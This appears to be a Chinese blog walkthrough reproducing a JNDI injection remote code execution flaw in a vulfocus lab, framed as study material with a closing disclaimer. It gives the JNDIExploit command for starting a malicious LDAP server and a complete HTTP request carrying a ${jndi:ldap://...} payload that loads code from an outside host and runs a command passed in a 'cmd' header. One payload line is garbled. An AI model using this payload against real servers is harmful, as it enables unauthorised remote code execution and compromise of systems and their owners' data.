前言
关于这个漏洞,啥都不用说了,直接发车。
工具下载
JNDIExploit:https://github.com/0x727/JNDIExploit
复现过程
-
启动靶场环境
直接用vulfocus启一个环境。
官网地址:http://vulfocus.fofa.so/
没注册的先注册,进来首页即可看到靶场
-
用JNDIExploit启一个ldap的服务。
-
命令如下:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
-
接着将payload更改如下:
payload=$注意Content-Type的类型为:application/x-www-form-urlencoded
在请求头中添加cmd字段,后面跟上需要执行的命令即可。完整数据包如下:
POST /hello HTTP/1.1 Host: vulfocus.fofa.so:41624 Content-Type: application/x-www-form-urlencoded cmd: whoami Content-Length: 47 payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
成功回显命令:
后记
本文章仅为学习交流,请勿利用从事非法渗透测试,否则后果自负,与本人无关。
本漏洞推荐使用公开靶场或自己搭建环境进行复现和研究,但切忌进行未授权测试。